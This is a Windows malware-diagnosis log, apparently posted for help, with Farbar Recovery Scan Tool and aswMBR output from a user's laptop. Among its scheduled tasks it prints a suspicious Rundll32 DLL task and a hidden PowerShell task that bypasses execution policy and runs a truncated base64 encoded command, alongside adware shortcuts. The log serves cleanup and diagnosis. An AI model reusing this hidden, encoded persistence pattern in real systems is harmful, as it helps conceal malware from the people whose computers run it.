(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0760D692-A784-43E7-85B8-2B2684E560A9} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {1526BB02-27BD-49DA-9D1E-D83BEB7D5B25} - System32\Tasks\FawnPediatricianMercuriallyV2 => Rundll32.exe PloppingOccupancies.dll,main 7 1 <==== ATTENTION
Task: {1C937EA3-02C6-4411-B988-23A42DA8BCDB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {240BB078-B706-4FBC-A966-315BD0CF04AA} - System32\Tasks\HPCeeScheduleForFawn => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {31080FF0-04D4-42FE-9F1D-C5931F761D09} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-01-03] (McAfee, Inc.)
Task: {5036E1E6-0240-44BA-9846-5DCA42CFD3BC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {5575AF6F-E83C-4C17-B6F8-7800F9BE18C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {5AA23701-E548-42E8-8807-A8AC6914BC39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {5AE6EF17-0F12-4444-8255-89C8BB6E4628} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {6546A02A-83CC-4FF5-902D-3014E7B66225} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {68378BB1-53EC-4C77-949B-C806FF502CEC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {79A6644D-454B-49A9-96AD-F1815FE7CB01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {840D75F4-6B63-425A-9218-F311DA896CDD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {855913D5-AD47-4E5E-AE26-9820E15453B9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {868E6E9F-5088-428A-966A-08CA9064672B} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {AAD4C20A-745E-4F5B-89C1-55960794CB50} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {AB055FD9-966F-40AB-8ADD-5A7B473AEC55} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {B1FA90AE-9C36-4B18-AC74-D64135779166} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {B4EECBD3-45D1-444D-BF90-2D3EC12F2F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {D1CAD731-070B-4B9F-A9F9-1FB6BED3BDB1} - System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9444 more characters).
Task: {DF03C2BA-FAA1-40E7-BB74-12E596E53688} - System32\Tasks\McAfee\McAfee Idle Detection Task
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForFawn.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\Public\Desktop\Get Dropbox Offer.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=en_us&pf=cnnb&s=db_dticon&tp=dropbox
==================== Loaded Modules (Whitelisted) ==============
2016-03-03 17:55 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-03-03 17:55 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-03-03 17:55 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-03-03 17:55 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-20 12:02 - 2016-02-17 20:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
There are 7872 more sites.
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 05:25 - 2016-03-03 19:07 - 00451004 ____R C:\Windows\system32\Drivers\etc\hosts
There are 15472 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E3864FAE-6A64-49A4-8EC9-93ED035533C8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0E191CF9-EFB6-47F7-ABCD-FDC2DADA84F4}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{5E267825-C5FF-452A-BB7B-D61D1BAD5214}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{5D8C4951-5247-4508-9227-738C2E481BBE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{D2F776E5-A0FF-460E-AA6F-2BF364B356A4}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{3C2C7B6D-7FA7-4A1A-8F9B-6303B534F974}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{B27066B6-B172-48F5-9D12-CCDD387530E5}] => (Allow) LPort=15600
FirewallRules: [{B6561EA3-49FD-4DA8-A039-364D5B0A1C84}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{DE3C52FC-975B-420C-8848-2DE54A0C9AF8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{B94C8BC6-6BB9-48D4-9486-3B2866AA6B72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9A46FF2-CECB-4F9F-9721-3E9B07F6BFF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service
==================== Restore Points =========================
04-03-2016 05:39:24 McAfee Vulnerability Scanner
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/04/2016 09:07:45 AM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 10:51:13 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\1e9c8a81-9089-4f7e-97fa-a873753b1cb9.dmp
Error: (03/03/2016 08:04:20 PM) (Source: Microsoft-Windows-RestartManager) (EventID: 10007) (User: NT AUTHORITY)
Description: Application or service 'HPWMISVC' could not be restarted.
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 2) (User: )
Description: DptfPolicyLpmServiceHelper
WinMain: CreateSharedMemory() failed.
Session ID = 1
Error: (03/03/2016 05:51:30 PM) (Source: DptfEvent) (EventID: 3) (User: )
Description: DptfPolicyLpmServiceHelper
CreateSharedMemory: WaitForSingleObject() with g_pkeLpmSharedMemoryCreated failed
Last error = [0x00000102]
Session ID = 1
Error: (03/03/2016 05:32:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 1e8
Start Time: 01d175b518e46520
Termination Time: 15
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 04908aea-e1a9-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:28:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 11.0.9600.18123 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 63c
Start Time: 01d175b4af4ee3db
Termination Time: 0
Application Path: C:\Program Files\Internet Explorer\iexplore.exe
Report Id: 503e36bc-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 05:26:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18124 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: ce8
Start Time: 01d175b4af7c314d
Termination Time: 52
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Report Id: 2007fa25-e1a8-11e5-8274-d85de287d87e
Faulting package full name:
Faulting package-relative application ID:
Error: (03/03/2016 04:24:25 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)
Description: Chrome has encountered a fatal error.
ver=48.0.2564.116;lang=;guid=6B6C2921933C4069AC6D10216E3EE726;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\8ab6acec-cd82-4048-9469-19bd029fa366.dmp
System errors:
=============
Error: (03/04/2016 09:02:43 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:02:42 AM) (Source: DCOM) (EventID: 10016) (User: FAWNS)
Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}FawnsFawnS-1-5-21-4258770641-917365270-2992294631-1001LocalHost (Using LRPC)UnavailableUnavailable
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:37 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:01:34 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
Module Path: C:\Windows\System32\bcmihvsrv64.dll
Error: (03/04/2016 09:00:51 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error:
%%1056
Error: (03/04/2016 09:00:26 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (03/04/2016 09:00:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Security Center Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU N2840 @ 2.16GHz
Percentage of memory in use: 65%
Total physical RAM: 1939.04 MB
Available physical RAM: 666.2 MB
Total Virtual: 3878.07 MB
Available Virtual: 1542.62 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:21.13 GB) (Free:4.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 29.1 GB) (Disk ID: 1E53D2DD)
Partition: GPT.
==================== End of Addition.txt ============================
aswMBR version 1.0.1.2252 Copyright(c) 2014 AVAST Software
Run date: 2016-03-04 11:12:18
-----------------------------
11:12:18.458 OS Version: Windows x64 6.2.9200
11:12:18.474 Number of processors: 2 586 0x3708
11:12:18.474 ComputerName: FAWNS UserName: Fawn
11:12:18.505 Initialize success
11:12:18.520 VM: initialized successfully
11:12:18.520 VM: Intel CPU BiosDisabled
11:13:09.926 AVAST engine defs: 16030400
11:13:22.387 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:22.387 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:22.403 Disk 0 MBR read successfully
11:13:22.403 Disk 0 MBR scan
11:13:22.419 Disk 0 unknown MBR code
11:13:22.419 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:22.450 Disk 0 scanning C:\Windows\system32\drivers
11:13:22.825 Disk 0 statistics 3842/0/0 @ 29.78 MB/s
11:13:22.825 Scan stopped
11:13:26.515 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\00000028
11:13:26.515 Disk 0 Vendor: VID:15 0.1 Size: 29820MB BusType: 12
11:13:26.531 Disk 0 MBR read successfully
11:13:26.546 Disk 0 MBR scan
11:13:26.562 Disk 0 unknown MBR code
11:13:26.562 Disk 0 Partition 1 00 EE GPT 2097151 MB offset 1
11:13:26.593 Disk 0 scanning C:\Windows\system32\drivers
11:13:28.546 Service scanning
11:13:44.542 Modules scanning
11:13:44.573 Disk 0 trace - called modules:
11:13:44.588 ntoskrnl.exe CLASSPNP.SYS disk.sys sdstor.sys ACPI.sys sdbus.sys hal.dll
11:13:44.604 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xffffe000a5ae1060]
11:13:44.619 3 CLASSPNP.SYS[fffff8000305b170] -> nt!IofCallDriver -> \Device\00000028[0xffffe000a5ad2050]
11:13:44.619 5 sdstor.sys[fffff800035c1ebe] -> nt!IofCallDriver -> [0xffffe000a5a0ebe0]
11:13:44.635 7 ACPI.sys[fffff80002567c21] -> nt!IofCallDriver -> \Device\SdBus-0[0xffffe000a5acd060]
11:13:44.713 AVAST engine scan C:\Windows
11:13:45.356 AVAST engine scan C:\Windows\system32
11:14:44.522 AVAST engine scan C:\Windows\system32\drivers
11:14:46.277 AVAST engine scan C:\Users\Fawn
11:16:19.709 AVAST engine scan C:\ProgramData
11:16:30.592 Disk 0 statistics 1270889/0/0 @ 7.23 MB/s
11:16:30.608 Scan finished successfully
11:16:58.380 Disk 0 MBR has been saved successfully to "C:\Users\Fawn\Desktop\MBR.dat"
11:16:58.395 The log file has been saved successfully to "C:\Users\Fawn\Desktop\aswMBR.txt"
Thanks
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:04-03-2016
Ran by Fawn (administrator) on FAWNS (04-03-2016 10:04:58)
Running from C:\Users\Fawn\Desktop
Loaded Profiles: Fawn (Available Profiles: Fawn)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
(Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-12] (Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2830576 2014-08-31] (Synaptics Incorporated)
HKLM-x32\...\Run: [Digital Coupon Print Driver] => "C:\Program Files (x86)\Digital Coupon Printer\DigitalCouponPrinter.exe"
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
